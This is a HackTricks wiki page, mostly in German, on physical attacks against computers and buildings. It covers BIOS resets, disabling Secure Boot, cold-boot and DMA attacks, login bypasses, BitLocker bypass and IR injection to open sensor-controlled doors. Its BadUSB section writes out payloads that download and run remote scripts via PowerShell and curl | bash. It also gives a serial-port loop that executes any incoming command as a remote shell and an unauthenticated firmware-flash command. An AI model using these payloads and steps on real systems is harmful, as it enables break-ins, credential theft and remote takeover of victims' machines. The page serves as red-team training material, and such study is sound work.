Physische Angriffe

Tip

Lernen & ĂŒben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & ĂŒben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & ĂŒben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

UnterstĂŒtzen Sie HackTricks

BIOS-Passwortwiederherstellung und Systemsicherheit

Resetting the BIOS kann auf mehrere Weisen erfolgen. Die meisten Mainboards enthalten eine Batterie, die, wenn sie fĂŒr etwa 30 Minuten entfernt wird, die BIOS-Einstellungen einschließlich des Passworts zurĂŒcksetzt. Alternativ kann ein Jumper auf dem Mainboard angepasst werden, um diese Einstellungen zurĂŒckzusetzen, indem bestimmte Pins verbunden werden.

Wenn Hardware-Anpassungen nicht möglich oder praktikabel sind, bieten Software-Tools eine Lösung. Ein System von einer Live CD/USB mit Distributionen wie Kali Linux zu starten, verschafft Zugriff auf Tools wie killCmos und CmosPWD, die bei der BIOS-Passwortwiederherstellung helfen können.

Wenn das BIOS-Passwort unbekannt ist, fĂŒhrt das dreimalige falsche Eingeben in der Regel zu einem Fehlercode. Dieser Code kann auf Websites wie https://bios-pw.org verwendet werden, um möglicherweise ein brauchbares Passwort zu erhalten.

UEFI-Sicherheit

FĂŒr moderne Systeme, die UEFI statt des traditionellen BIOS verwenden, kann das Tool chipsec verwendet werden, um UEFI-Einstellungen zu analysieren und zu Ă€ndern, einschließlich dem Deaktivieren von Secure Boot. Dies kann mit dem folgenden Befehl erreicht werden:

python chipsec_main.py -module exploits.secure.boot.pk

RAM Analysis and Cold Boot Attacks

RAM behĂ€lt Daten kurz nach dem Abschalten der Stromversorgung, normalerweise fĂŒr 1 bis 2 Minuten. Diese Persistenz kann durch Aufbringen von KĂ€ltemitteln wie flĂŒssigem Stickstoff auf 10 Minuten verlĂ€ngert werden. WĂ€hrend dieses verlĂ€ngerten Zeitraums kann ein memory dump mit Tools wie dd.exe und volatility erstellt werden, um die Analyse durchzufĂŒhren.

Direct Memory Access (DMA) Attacks

INCEPTION ist ein Tool, das fĂŒr physische Speicher-Manipulation ĂŒber DMA entwickelt wurde und mit Schnittstellen wie FireWire und Thunderbolt kompatibel ist. Es erlaubt das Umgehen von Login-Prozeduren, indem der Speicher so gepatcht wird, dass jedes Passwort akzeptiert wird. Gegen Windows 10-Systeme ist es jedoch unwirksam.

Live CD/USB for System Access

Das Ersetzen von System-Binaries wie sethc.exe oder Utilman.exe durch eine Kopie von cmd.exe kann eine Eingabeaufforderung mit Systemrechten bereitstellen. Tools wie chntpw können verwendet werden, um die SAM-Datei einer Windows-Installation zu bearbeiten und Passwörter zu Àndern.

Kon-Boot ist ein Tool, das das Einloggen in Windows-Systeme ohne Kenntnis des Passworts ermöglicht, indem es temporÀr den Windows-Kernel oder UEFI modifiziert. Mehr Informationen unter https://www.raymond.cc.

Handling Windows Security Features

Boot and Recovery Shortcuts

  • Supr: Zugriff auf BIOS-Einstellungen.
  • F8: Ruft den Recovery-Modus auf.
  • Das DrĂŒcken der Shift-Taste nach dem Windows-Banner kann Autologon umgehen.

BAD USB Devices

GerĂ€te wie Rubber Ducky und Teensyduino dienen als Plattformen zur Erstellung von bad USB-GerĂ€ten, die beim Anschluss an einen Zielrechner vordefinierte Payloads ausfĂŒhren können.

Volume Shadow Copy

Mit Administratorrechten ist es möglich, ĂŒber PowerShell Kopien sensibler Dateien, einschließlich der SAM-Datei, zu erstellen.

BadUSB / HID Implant Techniques

Wi-Fi managed cable implants

  • Auf ESP32-S3 basierende Implantate wie Evil Crow Cable Wind verstecken sich in USB-A→USB-C- oder USB-C↔USB-C-Kabeln, melden sich ausschließlich als USB-Tastatur an und exponieren ihren C2-Stack ĂŒber Wi‑Fi. Der Operator muss das Kabel nur vom Opfer-Host mit Strom versorgen, einen Hotspot namens Evil Crow Cable Wind mit dem Passwort 123456789 erstellen und http://cable-wind.local/ (oder dessen DHCP-Adresse) im Browser aufrufen, um die eingebettete HTTP-Schnittstelle zu erreichen.
  • Die Browser-UI bietet Tabs fĂŒr Payload Editor, Upload Payload, List Payloads, AutoExec, Remote Shell und Config. Gespeicherte Payloads sind pro OS getaggt, Tastaturlayouts werden on-the-fly gewechselt und VID/PID-Strings können verĂ€ndert werden, um bekannte Peripherie zu imitieren.
  • Da sich der C2 im Kabel befindet, kann ein Telefon Payloads bereitstellen, die AusfĂŒhrung auslösen und Wi‑Fi-Zugangsdaten verwalten, ohne das Host-OS zu berĂŒhren — ideal fĂŒr physische Eindringlinge mit kurzer Dwell‑Time.

OS-aware AutoExec payloads

  • AutoExec-Regeln binden ein oder mehrere Payloads so, dass sie sofort nach der USB-Enumeration ausgelöst werden. Das Implantat fĂŒhrt ein leichtes OS-Fingerprinting durch und wĂ€hlt das passende Script aus.
  • Beispiel-Workflow:
  • Windows: GUI r → powershell.exe → STRING powershell -nop -w hidden -c "iwr http://10.0.0.1/drop.ps1|iex" → ENTER.
  • macOS/Linux: COMMAND SPACE (Spotlight) oder CTRL ALT T (terminal) → STRING curl -fsSL http://10.0.0.1/init.sh | bash → ENTER.
  • Da die AusfĂŒhrung unbeaufsichtigt erfolgt, kann allein das Tauschen eines Ladekabels initialen “plug-and-pwn”-Zugang im Kontext des angemeldeten Benutzers ermöglichen.

HID-bootstrapped remote shell over Wi-Fi TCP

  1. Keystroke bootstrap: A stored payload opens a console and pastes a loop that executes whatever arrives on the new USB serial device. A minimal Windows variant is:
$port=New-Object System.IO.Ports.SerialPort 'COM6',115200,'None',8,'One'
$port.Open(); while($true){$cmd=$port.ReadLine(); if($cmd){Invoke-Expression $cmd}}
  1. Cable bridge: Das Implantat hĂ€lt den USB CDC-Kanal offen, wĂ€hrend sein ESP32-S3 einen TCP-Client (Python script, Android APK oder desktop executable) zum Operator startet. Alle in die TCP-Session eingegebenen Bytes werden in die oben beschriebene serielle Schleife weitergeleitet, was remote command execution selbst auf air-gapped Hosts ermöglicht. Die Ausgabe ist begrenzt, daher fĂŒhren Operatoren typischerweise blind commands aus (Account-Erstellung, Staging zusĂ€tzlicher Tools, etc.).

HTTP OTA update surface

  • Der gleiche Web-Stack bietet ĂŒblicherweise unauthentifizierte Firmware-Updates an. Evil Crow Cable Wind hört auf /update und flasht beliebige hochgeladene BinĂ€rdateien:
curl -F "file=@firmware.ino.bin" http://cable-wind.local/update
  • Field operators can hot-swap features (e.g., flash USB Army Knife firmware) mid-engagement without opening the cable, letting the implant pivot to new capabilities while still plugged into the target host.

Bypassing BitLocker Encryption

BitLocker encryption can potentially be bypassed if the recovery password is found within a memory dump file (MEMORY.DMP). Tools like Elcomsoft Forensic Disk Decryptor or Passware Kit Forensic can be utilized for this purpose.

Social Engineering for Recovery Key Addition

A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.

Exploiting Chassis Intrusion / Maintenance Switches to Factory-Reset the BIOS

Many modern laptops and small-form-factor desktops include a chassis-intrusion switch that is monitored by the Embedded Controller (EC) and the BIOS/UEFI firmware. While the primary purpose of the switch is to raise an alert when a device is opened, vendors sometimes implement an undocumented recovery shortcut that is triggered when the switch is toggled in a specific pattern.

How the Attack Works

  1. The switch is wired to a GPIO interrupt on the EC.
  2. Firmware running on the EC keeps track of the timing and number of presses.
  3. When a hard-coded pattern is recognised, the EC invokes a mainboard-reset routine that erases the contents of the system NVRAM/CMOS.
  4. On next boot, the BIOS loads default values – supervisor password, Secure Boot keys, and all custom configuration are cleared.

Once Secure Boot is disabled and the firmware password is gone, the attacker can simply boot any external OS image and obtain unrestricted access to the internal drives.

Real-World Example – Framework 13 Laptop

The recovery shortcut for the Framework 13 (11th/12th/13th-gen) is:

Press intrusion switch  →  hold 2 s
Release                 →  wait 2 s
(repeat the press/release cycle 10× while the machine is powered)

Nach dem zehnten Zyklus setzt der EC ein Flag, das das BIOS anweist, das NVRAM beim nĂ€chsten Reboot zu löschen. Der gesamte Vorgang dauert ~40 s und erfordert nichts außer einem Schraubendreher.

Allgemeines Vorgehen zur Ausnutzung

  1. Power-on oder suspend-resume des Ziels, sodass der EC lÀuft.
  2. Entferne die Unterseite, um den intrusion/maintenance-Schalter freizulegen.
  3. Reproduziere das herstellerspezifische Toggle-Muster (siehe Dokumentation, Foren oder durch Reverse-Engineering der EC-Firmware).
  4. Wieder zusammenbauen und neu starten – Firmware-Schutzmechanismen sollten deaktiviert sein.
  5. Starte ein Live-USB (z. B. Kali Linux) und fĂŒhre die ĂŒblichen post-exploitation Maßnahmen durch (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).

Erkennung & Gegenmaßnahmen

  • Protokolliere Chassis-Intrusion-Ereignisse in der OS-Management-Konsole und korreliere sie mit unerwarteten BIOS-Resets.
  • Verwende Manipulationssiegel an Schrauben/Abdeckungen, um ein Öffnen zu erkennen.
  • Bewahre GerĂ€te in physisch kontrollierten Bereichen auf; gehe davon aus, dass physischer Zugriff gleich vollstĂ€ndiger Kompromittierung ist.
  • Deaktiviere, falls verfĂŒgbar, die herstellerspezifische “maintenance switch reset” Funktion oder fordere eine zusĂ€tzliche kryptografische Autorisierung fĂŒr NVRAM-Resets.

Covert IR Injection Against No-Touch Exit Sensors

Eigenschaften der Sensoren

  • GĂ€ngige “wave-to-exit” Sensoren koppeln einen near-IR LED-Emitter mit einem TV-remote-Ă€hnlichen Empfangsmodul, das erst nach mehreren Pulsen (~4–10) des korrekten TrĂ€gers (≈30 kHz) einen logischen High meldet.
  • Eine Kunststoffabdeckung verhindert, dass Emitter und EmpfĂ€nger direkt aufeinander schauen, sodass der Controller annimmt, jeder validierte TrĂ€ger kĂ€me von einer nahegelegenen Reflexion und ein Relais ansteuert, das den TĂŒröffner betĂ€tigt.
  • Sobald der Controller glaubt, ein Ziel sei vorhanden, Ă€ndert er oft die ausgehende ModulationshĂŒlle, aber der EmpfĂ€nger akzeptiert weiterhin jeden Burst, der mit dem gefilterten TrĂ€ger ĂŒbereinstimmt.

Angriffsablauf

  1. Erfasse das Emissionsprofil – klemme einen Logikanalysator an die Controller-Pins, um sowohl die Pre-Detection- als auch die Post-Detection-Wellenformen aufzuzeichnen, die die interne IR-LED antreiben.
  2. Spiele nur die “post-detection” Wellenform zurĂŒck – entferne/ignoriere den serienmĂ€ĂŸigen Emitter und betreibe eine externe IR-LED mit dem bereits ausgelösten Muster von Anfang an. Da dem EmpfĂ€nger nur Pulsanzahl/Frequenz wichtig sind, behandelt er den gefĂ€lschten TrĂ€ger als echte Reflexion und setzt die Relais-Leitung.
  3. Takte die Übertragung – sende den TrĂ€ger in abgestimmten Bursts (z. B. einige zehn Millisekunden an, Ă€hnlich aus), um die minimale Pulssumme zu liefern, ohne die AGC oder die Störungsbehandlungs-Logik des EmpfĂ€ngers zu sĂ€ttigen. Dauerbetrieb des Senders desensibilisiert den Sensor schnell und verhindert, dass das Relais auslöst.

Long-Range Reflective Injection

  • Der Austausch der Labor-LED gegen eine Hochleistungs-IR-Diode, einen MOSFET-Treiber und Fokussieroptik ermöglicht zuverlĂ€ssiges Triggern aus ~6 m Entfernung.
  • Der Angreifer benötigt keine Sichtlinie zum Empfangsfenster; das Zielen des Strahls auf InnenwĂ€nde, Regale oder TĂŒrrahmen, die durch Glas sichtbar sind, lĂ€sst reflektierte Energie in das ~30° Sichtfeld eintreten und imitiert eine Nahbereichs-Handbewegung.
  • Da die EmpfĂ€nger nur schwache Reflexionen erwarten, kann ein deutlich stĂ€rkerer externer Strahl von mehreren OberflĂ€chen abprallen und trotzdem ĂŒber dem Erkennungsschwellenwert bleiben.

Weaponised Attack Torch

  • Das Einbetten des Treibers in eine handelsĂŒbliche Taschenlampe versteckt das Werkzeug in voller Sicht. Ersetze die sichtbare LED durch eine Hochleistungs-IR-LED, die an das Band des EmpfĂ€ngers angepasst ist, fĂŒge einen ATtiny412 (oder Ă€hnlichen) hinzu, um die ≈30 kHz Bursts zu erzeugen, und verwende einen MOSFET, um den LED-Strom zu treiben.
  • Eine Teleskop-Zoomlinse bĂŒndelt den Strahl fĂŒr Reichweite/PrĂ€zision, wĂ€hrend ein Vibrationsmotor unter MCU-Steuerung haptische BestĂ€tigung gibt, dass die Modulation aktiv ist, ohne sichtbares Licht abzugeben.
  • Das Durchlaufen mehrerer gespeicherter Modulationsmuster (leicht unterschiedliche TrĂ€gerfrequenzen und HĂŒllen) erhöht die KompatibilitĂ€t ĂŒber umgelabelte Sensorfamilien hinweg und erlaubt es dem Operator, reflektierende FlĂ€chen abzusuchen, bis das Relais hörbar klickt und die TĂŒr freigegeben wird.

References

Tip

Lernen & ĂŒben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & ĂŒben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & ĂŒben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

UnterstĂŒtzen Sie HackTricks